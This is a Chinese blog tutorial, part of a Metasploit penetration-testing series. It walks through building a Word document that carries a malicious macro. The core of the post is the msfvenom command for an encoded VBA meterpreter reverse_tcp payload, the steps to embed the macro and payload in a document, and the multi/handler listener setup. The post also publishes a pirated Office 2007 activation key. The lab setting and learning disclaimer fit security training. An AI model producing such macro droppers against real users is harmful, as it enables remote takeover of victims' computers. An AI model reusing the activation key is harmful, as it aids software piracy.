Metasploit 内网渗透四 —Metasploit 渗透测试之利用木马、病毒实施渗透4 —利用宏感染 word 文档获取 shell

已于 2024-08-02 09:16:25 修改
阅读量1.1k 收藏 23
点赞数 19
文章标签: word 网络安全 安全 windows
于 2024-08-02 09:16:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63701503/article/details/140863241
版权

目录

利用宏感染 word 文档获取 shell

(1)win7安装office2007

(2)msfvenom生成木马 --宏代码和payload

(3)office新建文档并配置宏和payloads

(4)MSF 配置侦听,生成session

Metasploitable2-linux:靶机 192.168.234.8

kali-debian:攻击机 192.168.234.141

win7 虚拟机:靶机 192.168.234.158

在此声明文章仅供相互学习参考,严禁利用于违法犯忌,任何事故自行承担!!

利用宏感染 word 文档获取 shell

总结:

                (1)win7安装office2007

                (2)msfvenom生成木马 --宏代码和payload

                (3)office新建文档(内容都可),文档中建宏(生成的木马宏代码复制进去)并将payload(生成的木马payload)复制进文档

                (4)MSF 配置侦听

                        ————利用exploit/multi/handler模块,设置payload为windows/meterpreter/reverse_tcp,攻击建立session会话

(1)win7安装office2007

将 cn_office_professional_plus_2007_dvd_X12-38713.rar 上传到 win7 虚拟上,解压后, 安装 office。

office 的激活码: DBXYD-TF477-46YM4-W74MH-6YDQ8

(2)msfvenom生成木马 --宏代码和payload

root@zwzj:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.234.141 LPORT=4444 -e x86/shikata_ga_nai -i 10 -f vba-exe

——msfvenom生成木马,执行完成后会生成 2 段代码

第一段代码是 MACRO CODE [ˈmækrəʊ kəʊd] 宏代码

第二段代码 payload,从PAYLOAD DATA开始一直最后。

(3)office新建文档并配置宏和payloads

复制宏代码,打开msoffice word新建宏

复制第一段 code 代码内容到编辑器中,保存后关闭宏编辑器窗口即可。

复制第二段代码 payload 到 word 正文,然后另存为文档。

另存为

(4)MSF 配置侦听,生成session

msf6 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 192.168.234.141

msf6 exploit(multi/handler) > jobs -K

msf6 exploit(multi/handler) > exploit

配置好侦听之后我们打开我们制作的 word 文档,文档一旦打开就会执行 payload 连接到 MSF,关闭 word 文档之后 session 不受影响

允许运行宏:

打开之后回到 MSF 控制台,会发现Session 已经建立,但是我的电脑报错(路径/文件访问错误—宏代码的问题,所以我就不做修改了,如果代码路径等正确,msf会出现会话

meterpreter > getuid

Server username: WIN- \zj

我们尝试把 payload 转移到其他进程

meterpreter > getpid ——获取当前进程 pid

Current pid: 212

meterpreter > ps ———查看进程列表,在 ps 列出的进程列表,倒数第 3 个就是我们进程的 pid

久久归依
关注
metasploit文件格式漏洞渗透攻击(成功生成doc)
天元喜羊羊的博客
05-13 2896
因为BT5R3失败了,所以现在换成了BT5R1。 msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/mete
Metasploit病毒攻击演示
KEY0NE的个人博客
11-02 1242
摘要:利用metasploit生成病毒代码,放入office文件中;当受害者打开文件时,返回meterpreter会话。测试环境:受害机:win10(192.168.8.123) 攻击机:kali(192.168.8.131)攻击演示:1、生成能反弹会话的病毒代码use windows/meterpreter/reverse_tcp set lhost 192...
Metasploit 内网渗透Metasploit 渗透测试利用木马病毒实施渗透4 —基于 java 环境的漏洞利用获取 shell
天下著书立传者,皆为我师
07-02 994
Metasploit 渗透测试利用木马病毒实施渗透2 —基于 java 环境的漏洞利用获取 shell
Metasploit 内网渗透Metasploit 渗透测试利用木马病毒实施渗透1 — 制作 windows 和 linux 客户端恶意软件进行渗透
天下著书立传者,皆为我师
05-29 2253
通过制作含病毒木马的恶意程序,利用msfvenom模块,完成靶机与msf相应的通信
Metasploit 内网渗透Metasploit 渗透测试利用木马病毒实施渗透3 —利用 0DAY 漏洞 CVE-2018-8174 获取 shell
天下著书立传者,皆为我师
06-28 820
利用0DAY漏洞(IE浏览器的漏洞)可以向页面注入libs脚本,可以写libs木马脚本注入进去,进行木马攻击,类似于XSS
Metasploit 内网渗透Metasploit 渗透测试利用木马病毒实施渗透2 —制作恶意 deb 软件包来触发后门
天下著书立传者,皆为我师
06-20 996
通过msfvenonom生成病毒木马到软件包,目标机下载含木马的deb软件,完成与msf相应的通信
Metasploit渗透测试框架
2301_80361487的博客
05-26 1260
web_delivery支持php/python/powershell等多种脚本,使用不同的脚本的payload时需要通过set target 0或1或2来设置是使用php还是python还是powershell等。meterpreter是一个高级、动态、可扩展的payload,简单理解是一个高级的CMD,里面封装了Metasploit的。:漏洞利用模块,包含主流的漏洞利用脚本,通常是对某些可能存在漏洞的目标进行漏洞利用。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的漏洞,并持续保持更新。
渗透之——Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网
冰河的专栏
01-12 6080
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86357202 攻击机:Kali 192.168.109.137 靶机:Metasploitable2 192.168.109.140 内网另一主机: Metasploitable2 192.168.109.159 工具:Metasploit 1.开启MSF msfc...
内网渗透 Metasploit(MSF)基础使用
热门推荐
qq_49433473的博客
10-24 1万+
内网渗透 Metasploit(MSF)使用,信息搜集,模块详解,端口扫描,反弹shell
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 2781
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 8339
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
48-2 内网渗透 - 利用Metasploit提权
weixin_43263566的博客
06-19 159
Metasploit是一个开源的安全漏洞检测工具,广泛用于安全和IT专业人士识别、验证和利用安全漏洞,同时也支持专家驱动的安全评估和管理。
CTF内网渗透笔记
qq_26579613的博客
11-10 4009
一、漏洞挖掘相关工具的使用 NMAP扫描工具使用 1.扫描指定的IP范围 nmap 192.168.0.101-110 2.扫描指定的IP网段 nmap 192.168.0.* --exclude 192.168.0.100 3.扫描指定网址的操作系统类型(深度扫描) nmap -A 192.168.0.101 or nmap -O 192.168.0.101 4.扫描网络内活跃的主机(该命令会跳过端口扫描或检测) nmap -sP 192.168.0.* 5.快速扫描主
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4560
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
word选择题转excel(一键转写,无格式要求)
m0_71280706的博客
10-29 540
为了能够自动化实现转写,适应各种格式和文件,做了大量的工程开发,经过测试解析出来的试题95%都是正确的,只要word文件足够标准(没有水平、批注、页眉页脚这类非试题信息),甚至可以达到100%的准确率(选择题转excel,其他题型自然也能解析,就是需要自己在审核一下)对于pdf、图片,都可以采用OCR(光学字符识别)的方法转换成word文档,pdf有时候可以直接转换,而不需要OCR。从左往右分别是“题干”,“选项A”,“选项B”,“选项C”,“选项D”,“正确答案”,“解析”。
如何将epub转换成word
最新发布
qs1137981843的博客
10-30 833
在快节奏的现代生活中,阅读电子书已成为一种便捷且流行的消遣方式,它让我们能随时随地沉浸在各类书籍的海洋中,然而,电子书并非只有一种面孔,不同的格式带来了截然不同的阅读体验,以epub格式为例,这是一种广泛应用的电子图书标准,专为电子书籍和数字出版物设计,epub格式的一大亮点在于其灵活的排版能力,能够根据不同设备的屏幕尺寸和分辨率自动调整文字大小和布局,确保读者在各种设备上都能获得舒适的阅读感受。步骤3:epub文件导入完成后,点击软件右上角的【开始转换】按钮,这样就可以启动软件的电子书转换程序。
MiniWord
qq_37159134的博客
10-30 551
天气情况{{zongti6}}1.nuget 下载配置。
Java根据word模板导出数据
yhj198927的博客
10-29 371
【代码】Java根据word模板导出数据。
Python世界:自动化办公Word之批量替换文本生成副本
来知晓的博客
10-30 630
为提高办公效率,用python试手了一个word任务,要求如下: > 给你一个基础word文档A,格式为docx,名字为:A.docx。A文档中有表格和文字,要求是将里面的字符串`"完成绘画"`分别替换成`完成制作款式x`和`复习制作款式x`,输出相应副本,命名为对应序号增序文档,如:`1、A.docx, 2、A.docx`。 > > 要求是输出1000份这样的增序文档
Metasploit渗透测试教程:利用MS12-004漏洞
"这篇文档详细介绍了如何利用Metasploit框架进行渗透测试,特别是针对MS12-004漏洞的利用。文中通过Backtrack5操作系统内置的工具,如Metasploit Framework和Netcat,展示了渗透测试的过程。" Metasploit是一款广泛...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值